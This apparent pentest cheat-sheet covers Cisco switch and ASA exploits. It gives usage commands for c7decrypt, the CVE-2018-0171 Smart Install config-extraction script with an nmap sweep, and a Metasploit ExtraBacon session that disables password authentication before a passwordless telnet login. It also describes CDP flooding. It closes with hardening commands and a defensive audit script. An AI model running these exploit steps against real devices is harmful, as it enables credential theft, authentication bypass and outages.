# Cisco Exploits
Some exploits and CVE for Cisco Switches.
# Cisco - Password 7 Crack
If you managed to extract the configuration file, you can decode any type 7 passwords it contains (type 7 is a reversible encoding, not a hash).
Github Link : https://github.com/claudijd/c7decrypt
Install c7decrypt:
```
gem install c7decrypt
```
Usage:
```
c7decrypt -s 04480E051A33490E
c7decrypt -f hashes.txt
```
# CVE-2018-0171 Cisco Smart Exploit
This Python 3 script targets TCP port 4786 on a Cisco device running Smart Install to exploit CVE-2018-0171. With this exploit, an attacker can craft a payload, send it to the Cisco device, and then extract the contents of the running-config file.
- Github Link : https://github.com/AlrikRr/Cisco-Smart-Exploit
The Cisco Smart Exploit script can:
- Extract the running-config file
- Parse and decrypt type 7 secrets
- Parse plain text passwords
- Parse all the community strings
```
# Target a single Cisco Switch
python3 cisco-se.py -i 192.168.10.1
# Target a list of Cisco Switches
python3 cisco-se.py -f ip_list.txt
# Target a running-config file
python3 cisco-se.py -c running-config.txt
```
For the -f FILE option, here is an example that builds the list with nmap:
```
nmap -p 4786 10.20.30.0/24 --open -Pn -oG - | awk '/Up$/{print $2}' > ip_list.txt
```
# Cisco ASA - CVE-2016-6366
Cisco ASA is the operating system of the Cisco Adaptive Security Appliance.
PoC Link : https://github.com/RiskSense-Ops/CVE-2016-6366.git
A buffer overflow in the Simple Network Management Protocol (SNMP) code (versions 1, 2c, and 3) is exploitable when SNMP is enabled on a virtual or physical Cisco ASA device (the "ExtraBacon" exploit).
The attacker must know the SNMP community string to exploit this vulnerability.
If SNMP is enabled, try to find the community string with the Metasploit snmp_login module:
```
msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOSTS => 192.168.206.114
msf auxiliary(snmp_login) > run
```
Now try to exploit the CVE with the Metasploit module:
```
msf auxiliary(cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.206.114  yes       The target address
   RPORT      161              yes       The target port
   TIMEOUT    1                yes       SNMP Timeout

msf auxiliary(cisco_asa_extrabacon) > run
```
If the exploit succeeds, try to log in with telnet: the attacker can log into the Cisco device with no password.
```
$ telnet 192.168.206.114
ciscoasa> ?
```
# CVE-2020-3452 ASA-FTD
Basic exploit abusing CVE-2020-3452 to enumerate the standard files accessible in the web directory of Cisco ASA/FTD appliances.
Github Link : https://github.com/3ndG4me/CVE-2020-3452-Exploit
# Cisco ASA - CVE-2018-0101 RCE
Github Link : https://gist.github.com/paralax/3692f7c758a28d0bad29a3102ebbcff2
A Metasploit module exists for this exploit.
This module exploits a vulnerability in the Cisco AnyConnect VPN service.
Affected versions: ASA 6.0.0 to 6.2.2
https://www.cvedetails.com/cve/CVE-2018-0101/
# CDP Flooding
DoS against any Cisco device that runs CDP and stores the advertisements in its CDP table: send a CDP packet every 1 ms and wait up to 5 minutes for the table to fill.
# Leak information
Capturing CDP traffic can disclose details of the network configuration.
# Recommendations
- Disable CDP on every port
- Uplink ports can stay enabled
To enable CDP on a specific interface, use the cdp enable command in interface configuration mode. CDP is enabled by default. You can disable it on an interface with the no cdp enable command.
```
Switch(config-if)# cdp enable
Switch(config-if)# no cdp enable
```
To configure the CDP hello time and hold time, use the commands below. Times are in seconds.
```
Switch(config)# cdp timer 50
Switch(config)# cdp holdtime 100
```
To verify CDP, use the general CDP verification commands below:
```
Switch# show cdp
Switch# show cdp interface
Switch# show cdp neighbors
Switch# show cdp entry
Switch# show cdp traffic
```
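The weaknesses the sections above depend on (type 7 and clear-text passwords, SNMPv1/v2c community strings, the Smart Install client behind CVE-2018-0171, and CDP left on every port) can all be spotted in a running-config before anyone has to run these tools. The audit script below is an added example written for this page, not code from any of the linked projects; the sample config is constructed, the finding names are mine, and it assumes IOS semantics where an omitted `no cdp run` / `no vstack` means the feature is still at its enabled default.

```python
import re
# Constructed sample running-config excerpt (not from a real device; the
# type 7 string and the $9$ hash are placeholders, not real credentials).
SAMPLE_CONFIG = """\
enable password cisco123
username admin password 7 04480E051A33490E
username ops secret 9 $9$PLACEHOLDER.not.a.real.hash
snmp-server community public RO
interface GigabitEthernet0/1
 description uplink
interface GigabitEthernet0/2
 no cdp enable
"""
# Per-line checks: (finding id, regex on the stripped line, why it matters)
LINE_CHECKS = [
    ("plaintext-password",
     re.compile(r"^(?:enable |username \S+ )password(?: 0)? (?!7 )\S+$"),
     "clear-text credential; use 'enable secret' / 'username ... secret'"),
    ("type7-password",
     re.compile(r"^(?:enable |username \S+ )password 7 \S+$"),
     "type 7 is a reversible encoding (what c7decrypt undoes); use 'secret'"),
    ("snmp-community",
     re.compile(r"^snmp-server community \S+"),
     "v1/v2c community string, the precondition for ExtraBacon; use SNMPv3"),
]
def audit_config(text: str) -> list[tuple[str, str]]:
    """Return (finding id, detail) pairs for an IOS-style running-config."""
    findings, cdp_on, iface = [], [], None
    lines = [ln.strip() for ln in text.splitlines()]
    for line in lines:
        if line.startswith("interface "):
            iface = line.split(" ", 1)[1]
            cdp_on.append(iface)                      # IOS default: CDP on
        elif line == "no cdp enable" and iface in cdp_on:
            cdp_on.remove(iface)
        findings += [(fid, line) for fid, rx, _ in LINE_CHECKS if rx.match(line)]
    # Assumption: defaults are not printed, so CDP and the Smart Install
    # client are still on unless the explicit 'no ...' form is present.
    if "no cdp run" not in lines:
        findings.append(("cdp-global", "'no cdp run' absent"))
    if "no vstack" not in lines:
        findings.append(("smart-install", "'no vstack' absent (client on TCP 4786)"))
    findings += [("cdp-interface", i) for i in cdp_on]
    return findings
if __name__ == "__main__":
    why = {fid: msg for fid, _, msg in LINE_CHECKS}
    for fid, detail in audit_config(SAMPLE_CONFIG):
        print(f"[{fid}] {detail}  {why.get(fid, '')}".rstrip())
```

Run it against a real `show running-config` dump instead of SAMPLE_CONFIG to get the list of items to fix with `enable secret`, `username ... secret`, SNMPv3, `no vstack` and per-port `no cdp enable`.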
